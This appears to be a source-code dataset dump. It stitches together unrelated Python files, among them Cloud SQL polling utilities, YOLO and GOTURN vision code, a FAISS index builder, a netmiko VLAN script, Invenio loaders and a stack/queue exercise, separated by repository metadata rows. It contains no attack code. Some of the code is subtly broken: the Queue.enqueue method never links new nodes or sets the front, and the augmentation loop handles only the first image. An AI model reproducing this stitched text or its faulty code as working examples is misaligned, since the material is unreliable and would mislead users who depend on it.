  """Common utility functions for sql operations."""
  # Polling tuning knobs (units per the suffixes: seconds / milliseconds).
  _PRE_START_SLEEP_SEC = 1      # initial sleep before the first poll
  _INITIAL_SLEEP_MS = 2000      # first retry interval
  _MAX_WAIT_MS = 300000         # give up after 300s total
  _WAIT_CEILING_MS = 20000      # cap between successive retries
  _HTTP_MAX_RETRY_MS = 2000     # tolerate transient HttpErrors this long
  @classmethod
  def WaitForOperation(cls, sql_client, operation_ref, message):
    """Wait for a Cloud SQL operation to complete.

    No operation is done instantly. Wait for it to finish following this logic:
    First wait 1s, then query, then retry waiting exponentially more from 2s.
    We want to limit to 20s between retries to maintain some responsiveness.
    Finally, we want to limit the whole process to a conservative 300s. If we
    get to that point it means something is wrong and we can throw an exception.

    Args:
      sql_client: apitools.BaseApiClient, The client used to make requests.
      operation_ref: resources.Resource, A reference for the operation to poll.
      message: str, The string to print while polling.

    Returns:
      True if the operation succeeded without error.

    Raises:
      OperationError: If the operation has an error code, is in UNKNOWN state,
          or if the operation takes more than 300s.
    """
    # GetOperationStatus *returns* (does not raise) exceptions, so the retry
    # policy can be decided here based on the returned result.
    def ShouldRetryFunc(result, state):
      # In case of HttpError, retry for up to _HTTP_MAX_RETRY_MS at most.
      if isinstance(result, exceptions.HttpError):
        if state.time_passed_ms > _BaseOperations._HTTP_MAX_RETRY_MS:
          raise result
        return True
      # In case of other Exceptions, raise them immediately.
      if isinstance(result, Exception):
        raise result
      # Otherwise let the retryer do it's job until the Operation is done.
      return not result
    with console_progress_tracker.ProgressTracker(
        message, autotick=False) as pt:
      time.sleep(_BaseOperations._PRE_START_SLEEP_SEC)
      retryer = retry.Retryer(exponential_sleep_multiplier=2,
                              max_wait_ms=_BaseOperations._MAX_WAIT_MS,
                              wait_ceiling_ms=_BaseOperations._WAIT_CEILING_MS)
      try:
        # The tracker is ticked from inside GetOperationStatus on every poll.
        retryer.RetryOnResult(cls.GetOperationStatus,
                              [sql_client, operation_ref],
                              {'progress_tracker': pt},
                              should_retry_if=ShouldRetryFunc,
                              sleep_ms=_BaseOperations._INITIAL_SLEEP_MS)
      except retry.WaitException:
        # Timed out (_MAX_WAIT_MS); tell the user how to keep waiting.
        raise errors.OperationError(
            ('Operation {0} is taking longer than expected. You can continue '
             'waiting for the operation by running `{1}`').format(
                 operation_ref,
                 cls.GetOperationWaitCommand(operation_ref)))
class OperationsV1Beta3(_BaseOperations):
  """Common utility functions for sql operations V1Beta3."""
  @staticmethod
  def GetOperationStatus(sql_client, operation_ref, progress_tracker=None):
    """Helper function for getting the status of an operation for V1Beta3 API.

    Args:
      sql_client: apitools.BaseApiClient, The client used to make requests.
      operation_ref: resources.Resource, A reference for the operation to poll.
      progress_tracker: progress_tracker.ProgressTracker, A reference for the
          progress tracker to tick, in case this function is used in a Retryer.

    Returns:
      True: if the operation succeeded without error.
      False: if the operation is not yet done.
      OperationError: If the operation has an error code or is in UNKNOWN state.
      Exception: Any other exception that can occur when calling Get
    """
    if progress_tracker:
      progress_tracker.Tick()
    try:
      # V1Beta3 Get requires the instance in addition to project/operation.
      op = sql_client.operations.Get(
          sql_client.MESSAGES_MODULE.SqlOperationsGetRequest(
              project=operation_ref.project,
              instance=operation_ref.instance,
              operation=operation_ref.operation))
    except Exception as e: # pylint:disable=broad-except
      # Since we use this function in a retryer.RetryOnResult block, where we
      # retry for different exceptions up to different amounts of time, we
      # have to catch all exceptions here and return them.
      return e
    # V1Beta3 exposes errors as a list and progress via op.state
    # (V1Beta4 below uses op.error.errors and op.status instead).
    if op.error:
      return errors.OperationError(op.error[0].code)
    if op.state == 'UNKNOWN':
      return errors.OperationError(op.state)
    if op.state == 'DONE':
      return True
    return False
  @staticmethod
  def GetOperationWaitCommand(operation_ref):
    # Command the user can run to continue waiting for this operation.
    return 'gcloud sql operations wait -i {0} --project {1} {2}'.format(
        operation_ref.instance, operation_ref.project, operation_ref.operation)
class OperationsV1Beta4(_BaseOperations):
  """Common utility functions for sql operations V1Beta4."""

  @staticmethod
  def GetOperationStatus(sql_client, operation_ref, progress_tracker=None):
    """Poll a V1Beta4 operation once and report its state.

    Args:
      sql_client: apitools.BaseApiClient, The client used to make requests.
      operation_ref: resources.Resource, A reference for the operation to poll.
      progress_tracker: progress_tracker.ProgressTracker, A reference for the
          progress tracker to tick, in case this function is used in a Retryer.

    Returns:
      True: if the operation succeeded without error.
      False: if the operation is not yet done.
      OperationError: If the operation has an error code or is in UNKNOWN state.
      Exception: Any other exception that can occur when calling Get
    """
    if progress_tracker:
      progress_tracker.Tick()
    try:
      op = sql_client.operations.Get(
          sql_client.MESSAGES_MODULE.SqlOperationsGetRequest(
              project=operation_ref.project,
              operation=operation_ref.operation))
    except Exception as e:  # pylint:disable=broad-except
      # Callers invoke this from retryer.RetryOnResult, which applies
      # different retry windows per exception type, so exceptions are
      # returned rather than raised here.
      return e
    if op.error and op.error.errors:
      return errors.OperationError(op.error.errors[0].code)
    status = op.status
    if status == 'UNKNOWN':
      return errors.OperationError(status)
    return status == 'DONE'

  @staticmethod
  def GetOperationWaitCommand(operation_ref):
    # Command the user can run to continue waiting for this operation.
    return ('gcloud beta sql operations wait --project '
            '{0.project} {0.operation}'.format(operation_ref))
| 40.276243 | 84 | 0.705898 | 6,405 | 0.878601 | 0 | 0 | 5,964 | 0.818107 | 0 | 0 | 3,914 | 0.5369 |
0ddb5907cfb4e23bc38acc79b824cb21a1af696d | 1,171 | py | Python | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2022-01-19T14:01:09.000Z | 2022-01-19T14:01:09.000Z | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2019-10-28T08:33:59.000Z | 2019-10-28T08:33:59.000Z | objectDetection/detect_images.py | pklink/python-opencv | b1bb82f1e3eccc8e5dcba9e5b595e5976435bdbe | [
"Apache-2.0"
] | 1 | 2019-10-28T08:26:38.000Z | 2019-10-28T08:26:38.000Z | import argparse
import glob
import os, shutil
import cv2
from YoloObjectDetector import YoloObjectDetector
parser = argparse.ArgumentParser(description="Detect Objects in all images in the given folder.")
parser.add_argument("-s", "--size", dest="size", default="320", type=str, help="Spatial Size (tiny, 320, 416, 608), default: 320")
parser.add_argument("input", type=str, help="Input folder.")
args = parser.parse_args()
modelSize = args.size
print("Using size " + modelSize)
detector = YoloObjectDetector(modelSize)
srcFolder = args.input
print("Using imagefolder " + srcFolder)
if os.path.exists("target"):
shutil.rmtree("target")
os.mkdir("target")
files = glob.glob(srcFolder + "/**/*.jpg", recursive=True)
numberFiles = len(files)
for idx, filename in enumerate(files):
print("{0:3.2f}% ({1:d}/{2:d})".format((100/numberFiles)*idx, idx, numberFiles))
if os.path.isfile(filename): # filter dirs
print(filename)
image = cv2.imread(filename)
image = detector.processImage(image)
if image is not None:
output = os.path.join("target", os.path.basename(filename))
cv2.imwrite(output, image)
| 30.815789 | 130 | 0.693424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 260 | 0.222032 |
0ddc0bef32477eced0900bb0111e6a1dbf4f7271 | 186 | py | Python | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | null | null | null | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | 8 | 2020-02-12T00:23:27.000Z | 2022-03-08T21:10:13.000Z | countries/api/urls.py | isidaruk/eurovision_project | 976743e66a2fed17c0513f17a9a7d35850e9cde5 | [
"MIT"
] | null | null | null | from rest_framework.routers import DefaultRouter
from countries.api.views import CountryViewSet
router = DefaultRouter()
router.register('', CountryViewSet)
urlpatterns = router.urls
| 20.666667 | 48 | 0.822581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0.010753 |
0ddcb23ab572dfee37d81ec252ad2030e3319efd | 1,675 | py | Python | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | null | null | null | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | 1 | 2020-11-10T01:31:39.000Z | 2020-11-10T01:31:39.000Z | python/code_challenges/stacks_and_queues/stacks_and_queues.py | brendanwelzien/data-structures-and-algorithms | 0bffe825e34de2e5c072b1e6b6c2cb1d7d1d61f5 | [
"MIT"
] | null | null | null | class Node:
def __init__(self, value, next_p=None):
self.next = next_p
self.value = value
def __str__(self):
return f'{self.value}'
class InvalidOperationError(Exception):
pass
class Stack:
def __init__(self):
self.top = None
def push(self, value):
current = self.top
if self.top == None:
self.top = Node(value)
else:
node_n = Node(value)
node_n.next = self.top
self.top = node_n
def pop(self):
if not self.top:
raise InvalidOperationError('Method not allowed on empty collection')
if self.top:
top_value = self.top
self.top = self.top.next
return top_value.value
def peek(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
return self.top.value
def is_empty(self):
return not self.top
class Queue:
def __init__(self):
self.f = None
self.r = None
def enqueue(self, value):
node = Node(value)
if self.r:
node = self.r.next
node = self.r
def dequeue(self):
if not self.f:
raise InvalidOperationError('Method not allowed on empty collection')
leave = self.f
if self.f == self.r:
self.r = None
self.f = self.f.next
return leave.value
def peek(self):
if not self.f:
raise InvalidOperationError('Method not allowed on empty collection')
return self.f.value
def is_empty(self):
return not self.f and not self.r
| 23.263889 | 81 | 0.560597 | 1,667 | 0.995224 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.104478 |
0ddf3f1c726adc70203174632e31094c4c2d0306 | 232 | py | Python | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | square/main.py | vishwamshuklaRazorpay/vishwam_test | b0925429385005dac37d92938b7daf6245d636c8 | [
"MIT"
] | null | null | null | def main():
number = int(input("Enter number (Only positive integer is allowed)"))
print(f'{number} square is {number ** 2}')
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
main()
| 25.777778 | 74 | 0.659483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.650862 |
0ddfe1e0014be1bb17e25a898cf24f24861860f8 | 1,869 | py | Python | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | null | null | null | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | 1 | 2022-02-05T09:35:32.000Z | 2022-02-05T09:35:32.000Z | src/GoTurnRemix.py | aakaashjois/Plant-Tracer | d56c8021665f419e08dddb1ac88d3a719b2c787a | [
"Apache-2.0"
] | 2 | 2019-07-28T11:10:31.000Z | 2021-05-19T02:27:39.000Z | import torch
from torchvision import models
from torch import nn
class GoTurnRemix(nn.Module):
    """
    GOTURN-style tracker that swaps the original CaffeNet backbone for
    AlexNet. Two crops (previous and current frame) are encoded by a frozen,
    ImageNet-pretrained AlexNet feature extractor, and the concatenated
    features are regressed to 4 bounding-box values.
    A PyTorch implementation of GOTURN can be found at:
    https://github.com/aakaashjois/PyTorch-GOTURN
    """

    def __init__(self):
        super(GoTurnRemix, self).__init__()
        # AlexNet pretrained on ImageNet, with its classifier head removed.
        backbone_layers = list(models.alexnet(pretrained=True).children())[:-1]
        self.features = nn.Sequential(*backbone_layers)
        # The backbone serves as a fixed feature extractor.
        for parameter in self.features.parameters():
            parameter.requires_grad = False
        self.regressor = nn.Sequential(
            nn.Linear(256 * 6 * 6 * 2, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4),
        )
        # Linear layers start with bias 1 and N(0, 0.005) weights.
        for layer in self.regressor.modules():
            if isinstance(layer, nn.Linear):
                layer.bias.data.fill_(1)
                layer.weight.data.normal_(0, 0.005)

    def forward(self, previous, current):
        previous_features = self.features(previous)
        current_features = self.features(current)
        # Flatten both feature maps and regress the box from their concatenation.
        flat_previous = previous_features.view(previous_features.size(0), 256 * 6 * 6)
        flat_current = current_features.view(current_features.size(0), 256 * 6 * 6)
        return self.regressor(torch.cat((flat_previous, flat_current), 1))
| 40.630435 | 114 | 0.612627 | 1,801 | 0.963617 | 0 | 0 | 0 | 0 | 0 | 0 | 561 | 0.300161 |
0de4d985008ec5f2946451370dc2a3228dbe91c7 | 609 | py | Python | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor | 2e715256ab170208255c935d1ae8e844ade27574 | [
"Apache-2.0"
] | 9 | 2019-09-16T20:37:37.000Z | 2021-07-26T05:04:36.000Z | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor | 2e715256ab170208255c935d1ae8e844ade27574 | [
"Apache-2.0"
] | 19 | 2019-10-28T22:18:56.000Z | 2022-03-12T00:08:34.000Z | python/examples/provenance/index_svc/buildrandom.py | xkortex/medifor-lite | 4567e16f59930417506e784e94f3fedb4afcc0c3 | [
"Apache-2.0"
] | 11 | 2019-08-02T18:56:43.000Z | 2021-04-05T20:32:55.000Z | #!/usr/bin/env python3
import faiss
import numpy as np
def main(outfile):
    """Build a small random IVF-Flat FAISS index and write it to `outfile`.

    100,000 random 100-d float32 vectors (with a drifting first component)
    are used both to train the coarse quantizer and to populate the index.
    The unused local `k = 4` from the original has been removed.
    """
    d = 100        # vector dimensionality
    nlist = 100    # number of IVF cells
    nb = 100000    # number of database vectors
    np.random.seed(1234)  # deterministic index contents
    xb = np.random.random((nb, d)).astype('float32')
    xb[:, 0] += np.arange(nb) / 1000.
    quantizer = faiss.IndexFlatL2(d)
    index = faiss.IndexIVFFlat(quantizer, d, nlist)
    index.train(xb)
    index.add(xb)
    faiss.write_index(index, outfile)
if __name__ == '__main__':
    # CLI entry point: a single positional argument naming the index file to write.
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('outfile', type=str, help='output file')
    main(parser.parse_args().outfile)
| 18.454545 | 59 | 0.627258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.103448 |
0de5d6a47d80b154cdbdae53819a355507f08a2e | 800 | py | Python | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | 11 | 2020-09-16T06:53:16.000Z | 2021-08-24T21:27:37.000Z | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | null | null | null | class3/exercises/exercise1.py | twin-bridges/netmiko_course | 31943e4f6f66dbfe523d62d5a2f03285802a8c56 | [
"Apache-2.0"
] | 5 | 2020-10-18T20:25:59.000Z | 2021-10-20T16:27:00.000Z | import os
from getpass import getpass
from pprint import pprint
from netmiko import ConnectHandler
# Code so automated tests will run properly
password = os.getenv("NETMIKO_PASSWORD") if os.getenv("NETMIKO_PASSWORD") else getpass()
arista1 = {
"device_type": "arista_eos",
"host": "arista1.lasthop.io",
"username": "pyclass",
"password": password,
}
with ConnectHandler(**arista1) as net_connect:
show_vlan = net_connect.send_command("show vlan", use_textfsm=True)
print()
print("VLAN Table:")
print("-" * 18)
pprint(show_vlan)
print()
for vlan_dict in show_vlan:
if vlan_dict["vlan_id"] == "7":
print()
print(f"VLAN ID: {vlan_dict['vlan_id']}")
print(f"VLAN name: {vlan_dict['name']}")
print()
| 25.806452 | 88 | 0.6425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 265 | 0.33125 |
0de6a3bbc2e8361502ee097dee7d73b1ea8c48de | 2,891 | py | Python | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | invenio_records_rest/loaders/marshmallow.py | Glignos/invenio-records-rest | 4020d9e8c8e21e7c760fa14f9c634636ef6fda38 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Marshmallow loader for record deserialization.
Use marshmallow schema to transform a JSON sent via the REST API from an
external to an internal JSON presentation. The marshmallow schema further
allows for advanced data validation.
"""
from __future__ import absolute_import, print_function
import json
from flask import request
from invenio_rest.errors import RESTValidationError
def _flatten_marshmallow_errors(errors):
"""Flatten marshmallow errors."""
res = []
for field, error in errors.items():
if isinstance(error, list):
res.append(
dict(field=field, message=' '.join([str(x) for x in error])))
elif isinstance(error, dict):
res.extend(_flatten_marshmallow_errors(error))
return res
class MarshmallowErrors(RESTValidationError):
"""Marshmallow validation errors.
Responsible for formatting a JSON response to a user when a validation
error happens.
"""
def __init__(self, errors):
"""Store marshmallow errors."""
self._it = None
self.errors = _flatten_marshmallow_errors(errors)
super(MarshmallowErrors, self).__init__()
def __str__(self):
"""Print exception with errors."""
return "{base}. Encountered errors: {errors}".format(
base=super(RESTValidationError, self).__str__(),
errors=self.errors)
def __iter__(self):
"""Get iterator."""
self._it = iter(self.errors)
return self
def next(self):
"""Python 2.7 compatibility."""
return self.__next__() # pragma: no cover
def __next__(self):
"""Get next file item."""
return next(self._it)
def get_body(self, environ=None):
"""Get the request body."""
body = dict(
status=self.code,
message=self.get_description(environ),
)
if self.errors:
body['errors'] = self.errors
return json.dumps(body)
def marshmallow_loader(schema_class):
"""Marshmallow loader for JSON requests."""
def json_loader():
request_json = request.get_json()
context = {}
pid_data = request.view_args.get('pid_value')
if pid_data:
pid, record = pid_data.data
context['pid'] = pid
context['record'] = record
result = schema_class(context=context).load(request_json)
if result.errors:
raise MarshmallowErrors(result.errors)
return result.data
return json_loader
def json_patch_loader():
"""Dummy loader for json-patch requests."""
return request.get_json(force=True)
| 27.798077 | 77 | 0.64303 | 1,210 | 0.41854 | 0 | 0 | 0 | 0 | 0 | 0 | 978 | 0.338291 |
0de9893144b5910f320fefedfcebe7eebec65b42 | 475 | py | Python | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
] | null | null | null | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
] | null | null | null | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
] | null | null | null | from flask import jsonify
from flask_restful import Resource
class User(Resource):
    """RESTful resource for a single user, addressed by id."""

    def get(self, id):
        """Return the (hard-coded) user representation."""
        return jsonify({'name': 'nabin khadka'})

    def put(self, id):
        pass

    def patch(self, id):
        pass

    def delete(self, id):
        pass
class UserList(Resource):
    """RESTful resource for the user collection."""

    def get(self):
        """Return the (hard-coded) list of users."""
        return jsonify([{'name': 'nabin khadka', 'email': 'sourav@gmail.com'}])

    def post(self):
        pass
| 16.964286 | 70 | 0.572632 | 408 | 0.858947 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.136842 |
0dea7700259f79cf79e451f3837519f4601762ad | 2,079 | py | Python | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | 1 | 2021-08-09T14:59:16.000Z | 2021-08-09T14:59:16.000Z | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | null | null | null | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | null | null | null | import os
import cv2
import glob
import random
import numpy as np
import matplotlib.pyplot as plt
def plot_image(img):
plt.axis("off")
plt.imshow(img, origin='upper')
plt.show()
def flip(img, dir_flag):
# if flag:
return cv2.flip(img, dir_flag)
# else:
# return img
def brightness(img, low, high):
value = random.uniform(low, high)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = np.array(hsv, dtype = np.float64)
hsv[:,:,1] = hsv[:,:,1]*value
hsv[:,:,1][hsv[:,:,1]>255] = 255
hsv[:,:,2] = hsv[:,:,2]*value
hsv[:,:,2][hsv[:,:,2]>255] = 255
hsv = np.array(hsv, dtype = np.uint8)
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def augment(dataset_dir, augmentations, save_copy=False):
image_paths = glob.glob(f"{dataset_dir}/RGB_*.png")
# Lets apply the augmentation to each image!
for image_path in image_paths[:1]:
# Will be useful for saving
img_filename = image_path.split('/')[-1].split('.')[0]
img = cv2.imread(image_path)
# Horizontal Flip -> flip(img, True)
img_hf = flip(img, 1)
if save_copy:
cv2.imwrite(f"{dataset_dir}/hf_{img_filename}", img_hf)
# Maybe we apply vertical flip to the horizontally flipped images as well?
# For now hard coding that process i.e. VF(HF(img)) by saving two copies
# Vertical Flip -> flip(img, False)
img_vf = flip(img, 0)
if save_copy:
cv2.imwrite(f"{dataset_dir}/vf_{img_filename}", img_vf)
# apply vertical flip to a horizontally flipped image.
cv2.imwrite(f"{dataset_dir}/vfhf_{img_filename}", flip(img_hf, 0))
# # Horizontal Flip
# img_hf = horizontal_flip(img, True)
# if save_copy:
# cv2.imwrite(f"{dataset_dir}/hf_{img_filename}", img_hf)
if __name__ == '__main__':
    # Run the augmentation on the first-training-data folder; note that
    # save_copy=False means only the vfhf_* combined flips are written.
    dataset_dir = "../data/FirstTrainingData_AUG"
    augmentations = ["horizontal_flip"]  # currently ignored by augment()
    # expect to increase the dataset 4x
    augment(dataset_dir, augmentations, save_copy=False)
0deb0c0b3259efb2f490fa173e3f279fb4d413e1 | 703 | py | Python | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | null | null | null | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | null | null | null | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | 1 | 2021-06-26T09:19:43.000Z | 2021-06-26T09:19:43.000Z | import os
def left_join(hash, hash1):
    """Left-join two dicts on their keys.

    Returns a list of ``[key, left_value, right_value]`` rows, one per key
    of *hash*; keys missing from *hash1* get the string ``'NULL'`` as the
    right value.

    NOTE: the parameter name shadows the builtin ``hash``; it is kept for
    backward compatibility with existing callers.
    """
    words = []
    # Iterate the dict directly and test membership on the dict itself
    # (``in hash1.keys()`` built an intermediate view/list needlessly).
    for key in hash:
        if key in hash1:
            words.append([key, hash[key], hash1[key]])
        else:
            words.append([key, hash[key], 'NULL'])
    return words
if __name__ == "__main__":
  # Demo: join a synonym map against an antonym map on the shared words.
  # 'outfit' has no antonym entry, so its row gets 'NULL'; 'flow' only
  # appears on the right and is therefore absent from the output.
  hash = {
    'fond':'enamored',
    'wrath':'anger',
    'diligent':'employed',
    'outfit':'garb',
    'guide':'usher'
  }
  hash1 = {
    'fond':'averse',
    'wrath':'delight',
    'diligent':'idle',
    'guide':'follow',
    'flow':'jam'
  }
  print(left_join(hash,hash1) )
| 17.146341 | 61 | 0.439545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.236131 |
0deb37fe04b5be7b019c80d0f79badcb0721fecc | 2,583 | py | Python | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# -*- encoding: utf-8 -*-
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from datable.core.serializers import BooleanSerializer
from datable.core.serializers import DateSerializer
from datable.core.serializers import DateTimeSerializer
from datable.core.serializers import TimedeltaSerializer
from datable.core.serializers import StringSerializer
class Column(object):
    """Base column for a data table, pairing a field name with a serializer.

    Class-level attributes act as overridable defaults: subclasses set
    ``serializerClass``/``sortable``/``formatter``, while instances may
    override any of them through the constructor.
    """
    label = None            # human-readable header; derived from name if unset
    width = None            # optional display width
    sortable = None         # whether the column may be used for ordering
    serializer = None       # serializer instance; built lazily from serializerClass
    serializerClass = None  # subclasses set this to their serializer type
    formatter = None        # optional client-side formatter name
    sortColumnName = None # Parameter for QuerySet.order_by
    def __init__(self, name, label=None, width=None,
                 serializer=None, sortable=None, sortColumnName=None):
        """Initialize the column for the model field *name*.

        Each ``if arg is not None`` guard lets an explicit constructor
        argument override the class-level default; the follow-up
        ``if self.attr is None`` checks then fill anything still unset.
        """
        self.name = name
        if label is not None:
            self.label = label
        if self.label is None:
            # Derive a translated, capitalized label from the field name.
            self.label = _(capfirst(self.name.replace("_", " ")))
        if width is not None:
            self.width = width
        if sortable is not None:
            self.sortable = sortable
        if serializer is not None:
            self.serializer = serializer
        if self.serializer is None:
            # Fall back to the subclass-declared serializer type.
            self.serializer = self.serializerClass(self.name)
        if sortColumnName is not None:
            self.sortColumnName = sortColumnName
        if self.sortColumnName is None and self.sortable:
            # Sortable columns default to ordering by their own field name.
            self.sortColumnName = name
    def sortQuerySet(self, querySet, desc):
        """Return *querySet* ordered by this column (descending if *desc*).
        """
        sort = self.sortColumnName
        if sort is None:
            raise Exception("This column can not be used to sort")
        if desc:
            # Django order_by convention: '-' prefix means descending.
            sort = '-' + sort
        return querySet.order_by(sort)
    def getName(self):
        """Return the underlying field name."""
        return self.name
    def getSerializer(self):
        """Return the serializer instance for this column."""
        return self.serializer
    def getLabel(self):
        """Return the display label."""
        return self.label
    def getFormatter(self):
        """Return the client-side formatter name (or None)."""
        return self.formatter
class StringColumn(Column):
    """Sortable column serialized as plain strings."""
    serializerClass = StringSerializer
    sortable = True
class DateColumn(Column):
    """Sortable column serialized as dates."""
    serializerClass = DateSerializer
    sortable = True
class DateTimeColumn(Column):
    """Sortable column serialized as datetimes."""
    serializerClass = DateTimeSerializer
    sortable = True
class TimedeltaColumn(Column):
    """Sortable column serialized as time deltas."""
    serializerClass = TimedeltaSerializer
    sortable = True
class BooleanColumn(Column):
    """Sortable column serialized as booleans."""
    serializerClass = BooleanSerializer
    sortable = True
class ImageColumn(Column):
    """Non-sortable column rendered with the client-side 'image' formatter."""
    formatter = 'image'
    sortable = False
class HrefColumn(Column):
    """Non-sortable column rendered with the client-side 'href' formatter."""
    formatter = 'href'
    sortable = False
| 23.697248 | 70 | 0.663957 | 2,145 | 0.83043 | 0 | 0 | 0 | 0 | 0 | 0 | 204 | 0.078978 |
0deb6190172a042c803576352b9c214cd3809bff | 1,233 | py | Python | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | from torch import nn
import torch.nn.functional as F
class FPNPredictor(nn.Module):
    """Head predicting car sub-class scores and a normalized rotation vector.

    Reads three sizes from the config: the MLP feature width, the number of
    car classes, and the rotation dimensionality (NUMBER_ROTS).
    """

    def __init__(self, cfg):
        super().__init__()
        representation_size = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.MLP_HEAD_DIM
        num_car_classes = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.NUMBER_CARS
        num_rot = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.NUMBER_ROTS

        self.cls_score = nn.Linear(representation_size, num_car_classes)
        self.rot_pred = nn.Linear(representation_size, num_rot)

        # Small-std Gaussian init for weights, zero biases.  The original
        # code zeroed both biases a second time in a trailing loop; that
        # redundant loop has been removed (no behavioral change).
        nn.init.normal_(self.cls_score.weight, std=0.01)
        nn.init.constant_(self.cls_score.bias, 0)
        nn.init.normal_(self.rot_pred.weight, std=0.001)
        nn.init.constant_(self.rot_pred.bias, 0)

    def forward(self, x):
        """Return (raw class logits, softmax class probs, unit-norm rotation).

        :param x: feature tensor of shape (N, representation_size).
        """
        cls_score = self.cls_score(x)
        cls = F.softmax(cls_score, dim=1)
        rot_pred = self.rot_pred(x)
        # L2-normalize so the rotation prediction lies on the unit sphere.
        rot_pred = F.normalize(rot_pred, p=2, dim=1)
        return cls_score, cls, rot_pred
# Registry of available predictor heads, keyed by their config name.
_ROI_CAR_CLS_ROT_PREDICTOR = {"FPNPredictor": FPNPredictor}


